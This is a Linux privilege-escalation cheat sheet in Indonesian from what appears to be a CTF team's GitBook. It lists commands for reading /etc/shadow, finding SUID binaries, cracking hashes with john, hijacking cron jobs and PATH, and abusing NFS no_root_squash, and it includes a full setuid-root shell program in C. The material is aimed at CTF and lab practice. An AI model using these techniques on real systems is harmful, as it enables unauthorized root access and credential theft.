N2L
  • 🔰N2L
  • ⏱️Writeup CTFs
    • 2024
      • Page
      • FindIT 2024
      • CR3 CTF 2024
      • TBTL CTF 2024
      • NahamCon CTF 2024
      • Template CTF 2024
      • N2LHaRD_Write_Up_Cyber_Hunt24
  • 📚cheatsheet
    • 🪟Windows Privilege Escalation
    • 🐧Linux Privilege Escalation
    • 🌐web exploitation
      • 💉sql injection
      • 🗂️server side template injection
      • 🌀Escaping nodejs vm
      • ⚕️prototype pollution
      • ⚔️Cross-Site Scripting (XSS)
    • 🦠binary exploitation
      • ✨stack
        • 0x1 Buffer Overflow
        • 0x2 Modifying variabel through BOF
        • 0x3 return to another function through BOF
        • 0x4
      • 🟰heap
        • 1️introduction
      • benerin nis
    • 🔎forensic
    • 📠cryptography
    • 🎫misc
    • 💹blockchain
  • 📒HackTheBox Writeup
    • 🆓Freelancer
    • 🔵Usage
    • 🤯Headless
    • ⛽SolarLab
    • 📩Mailing
Powered by GitBook
On this page
  • Enumerating Linux
  • Sudoers and Suid
  • Crack password
  • Capabilities
  • Cron Jobs
  • Exploiting Path
  • NFS ( Sharing Folder )
  1. cheatsheet

Linux Privilege Escalation

made by <3 with replican

PreviousWindows Privilege EscalationNextweb exploitation

Last updated 1 year ago

halo jadi aku akan membagi cheatsheet untuk linux privilage escalation hehe.

Enumerating Linux

nah di linux itu ada kernel , os versi dll. kalian dapat mengenumerasi nya dengan command2 dibawah ini

hostname
cat /etc/issue
uname -a
id
whoami
cat /etc/passwd
cat /etc/shadow

Sudoers and Suid

untuk cek kita sudoers apa bkn bs pake ini

sudo -l

nah kalau kalian pakai itu nanti muncul prompt input password. nah kalo kalian dalam keadaan revshell dan gtw passwordnya apa bisa pakai ini

find / -type f -perm -04000 -ls 2>/dev/null

nah kalau sudah dapet list binary nya, bisa di cek binary yg biasanya bisa di takeover sudonya lgsg ke gtfobins saja :

Crack password

kita tau kalo password itu kesimpen di /etc/shadow. gmn si kita crack passwordnya? kita bs pake john

pertama kita unshadow dlu seperti ini :

nah kalo sudah tinggal pakai john dan wordlist. bisa juga bruteforce attack. rulesny kalian bs buat sendiri

// ganti wordlistnya ke pathmu sendiri
john unshadowed.txt --wordlist=/home/replican/Desktop/Prod/CyberSecurity/seclists/Passwords/Leaked-Databases/rockyou.txt

Capabilities

check binary capabilities

mungkin ni prosesnya aga lama

getcap -r / 2>/dev/null

untuk kalo udh cek binary, ada yg sus lgsg ke gtfobins bagian capabilities.

Cron Jobs

cron job itu kaya scheduled task, script/command yg akan dieksekusi dalam setiap kurun waktu yg ditentukan bs permenit perjam perminggu dll

check crontab yg jalan

cat /etc/crontab

misal yg jalan itu python / bash script dan kamu dpt mengubahnya km tinggal ubah ke reverse punyamu dan km tunggu crontabnya jalan abis kejalan nnti revshell yg di sc abis km edit juga jalan.

bs juga kalo misalnya cron ke file yg udh gada / didelete km tinggal buat file nya di user mu skrg

Exploiting Path

path itu path yang ada di system istilahnya bs buat shortcut / alias. kalian bisa cek nya pake

echo $PATH

misal outputnya

/home/replican/.cargo/bin:/usr/local/sbin:/usr/local/bin:/usr/bin:/home/replican/.foundry/bin:/var/lib/flatpak/exports/bin:/usr/lib/jvm/default/bin:/usr/bin/site_perl:/usr/bin/vendor_perl:/usr/bin/core_perl:/usr/lib/rustup/bin:/var/lib/snapd/snap/bin:/home/replican/.local/share/bin

jadi semua folder yang ada di dalam path akan menjadi shortcut. misal di folder /home/replican/.cargo/bin

nah semua binary yg disitu akan tershortcut, jadi misal ada binary yang ngecall binbash bernama 'test' kita lgsg bisa panggil di terminal ketik aja test

jadi kalo ada binary yg setuid ke root/user lain dan menjalankan binary shortcut yg ditentukan path kita bisa mengtakeovernya

untuk enumerasi writeable folder bisa pakai ini

find / -writable 2>/dev/null

untuk menambahkan path baru ( ganti /tmp dgn writeable directory yg lain jika perlu )

export PATH=/tmp:$PATH

NFS ( Sharing Folder )

nah kadang di server itu ada nfs atau sharing folder ini untuk backup. kalian bisa mount ke machine kalian dan abis itu buat rootkit. misal abis di mount ke machine kita kita set binarynya by root terus chmod 4775 jadi di machine juga auto gitu. jadi kita tinggal jalanin rootkit yg kita mount di machine kita nanti di machine juga auto kepasang.

untuk enumerasi apa ada nfs di server bisa pakai

cat /etc/exports

nah kalo ada yang no_root_squash nah pasti vuln ini buat kita pasang rootkit

showmount -e <ip>

nah hbs itu kita mount ke punya kita, contoh:

sudo mount -o rw 10.10.166.215:/home/backup /tmp/thm/

habis itu kita compile rootkit di machine kita

// gcc -o /tmp/rootshell /tmp/rootshell.c
// chmod 4775 /tmp/rootshell

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
int main(void)
{
setuid(0); setgid(0); system("/bin/bash");
}

nah nnti muncul di server jalanin lgsg dpt root.

refferensi revshell :

📚
🐧
https://gtfobins.github.io/gtfobins
https://www.revshells.com/